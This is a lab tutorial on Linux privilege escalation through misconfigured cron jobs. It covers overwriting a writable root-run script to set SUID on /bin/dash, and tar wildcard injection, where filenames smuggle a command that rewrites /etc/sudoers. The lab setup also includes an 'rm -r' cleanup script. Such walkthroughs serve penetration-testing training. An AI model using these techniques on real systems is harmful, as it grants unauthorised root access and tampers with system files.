After
solving several OSCP Challenges we decided to write the article on the various
method used for Linux privilege escalation, that could be helpful for our
readers in their penetration testing project. In this article, we will learn “Privilege
Escalation by exploiting Cron Jobs” to gain root access of a remote host
machine and also examine how a bad implement cron job can lead to Privilege
escalation. If you have solved CTF challenges for Post exploit then by reading
this article you will realize the several loopholes that lead to privileges
escalation.
For details, you can read our previous article where we had applied this
trick for privilege escalation. Open the links given below:
Link1: Hack
the Box Challenge: Europa Walkthrough
Link2: Hack
the Milnet VM (CTF Challenge)
Table of content
·
Introduction
·
Cron job
·
Crontab syntax
·
Crontab File
overwrite
·
Lab Setup
(Ubuntu)
·
Exploiting cron
job (Kali Linux)
·
Crontab Tar
wildcard Injection
·
Lab Setup
(Ubuntu)
·
Exploiting cron
job (Kali Linux)
Let’s Start!!!
What is cron job?
Cron Jobs are used for scheduling tasks by executing commands at specific
dates and times on the server.
They're most commonly used for sysadmin jobs such as backups or cleaning /tmp/
directories and so on. The word Cron comes from crontab and it is present
inside /etc directory.
For example: Inside crontab we can add following entry to
print apache error logs automatically in every 1 hour.
1 0 * * * printf "" >
/var/log/apache/error_log
Crontab
File overwrite
Lab Setup for Poorly configured cron job
Objective: Set a new job with
help of crontab to run a python script which will erase all data from in a
particular directory.
Let assume “cleanup” is the directory whose data will be cleared
automatically in every two minutes. Thus we have saved some data inside
/home/cleanup.
mkdir cleanup
cd cleanup
echo “hello freinds” > 1.txt
echo “ALL files will be deleted in 2 mints” > 2.txt
echo “” > 1.php
echo “” > 2.php
ls
As you can observe from
given image some files are stored inside cleanup directory.
Now write a python program in any other directory to delete data
from inside /home/cleanup and give it all permission.
cd /tmp
nano cleanup.py
#!/usr/bin/env python
import os
import sys
try:
os.system('rm
-r /home/cleanup/* ')
except:
sys.exit()
chmod 777 cleanup.py
At last schedule a task with help of crontab to run
cleanup.py for every 2 minutes.
nano /etc/crontab
*/2 * * * *
root /tmp /cleanup.py
Now let’s verify the objectives
cd /home/cleanup
ls
date
ls
Coool!! It is working, as you can see all file has been
deleted after two minutes.
Post Exploitation
Start your attacking machine and first compromise the target
system and then move to privilege escalation stage. Suppose I successfully
login into victim’s machine through ssh and access non-root user terminal. Execute
the following command as shown below.
cat /etc/crontab
ls -al /tmp/cleanup.py
cat
/tmp/cleanup.py
From above steps, we notice the crontab is running python
script in every two minutes now let’s exploit.
There so many methods to gain root access as in this method
we enabled SUID bits /bin/dash. It is quite simple, first, open the file
through some editor, for example, nanocleanup.py and replace “rm -r /tmp/*” from
the following line as given below
os.system(‘chmod u+s
/bin/dash)
After two minutes it will set SUID permission for /bin/dash
and when you will run it will give root access.
/bin/dash
id
whoami
Awesome!! We hit the Goal…………………
Crontab
Tar Wildcard Injection
Lab Setup
Objective: schedule
a task with help of crontab to take backup with tar archival program of HTML
directory.
The directory should have executable permission whose backup
you are going to take.
Now schedule a task with help of crontab to run tar archival
program for taking backup of /html inside /var/backups in every 1 minute.
nano /etc/crontab
*/1 * * *
* root tar -zcf /var/backups/html.tgz
/var/www/html/*
Let's verify the schedule is working or not by executing
following command.
cd /var/backup
ls
date
From given below image you can notice the html.tgz file
has been generated after 1 minute.
Post Exploitation
Start your attacking machine and first compromise the target
system and then move to privilege escalation stage. Suppose I successfully
login into victim’s machine through ssh and access non-root user terminal. Then
open crontab to view if any job is scheduled.
cat /etc/crontab
Here we notice the target has scheduled a tar archival
program for every 1 minute and we know that cron job runs as root. Let’s try to
exploit.
Execute following command to grant sudo right to logged user
and following post exploitation is known as wildcard injection.
echo 'echo
"ignite ALL=(root) NOPASSWD: ALL" > /etc/sudoers' >test.sh
echo ""
> "--checkpoint-action=exec=sh test.sh"
echo ""
> --checkpoint=1
tar cf archive.tar
*
Now after 1 minute it will grant sudo right to the user:
ignite as you can confirm this with the given below image.
sudo -l
sudo bash
whoami
YUPPIEEEE!!! We have successfully obtained root access.
0 comments:
Post a Comment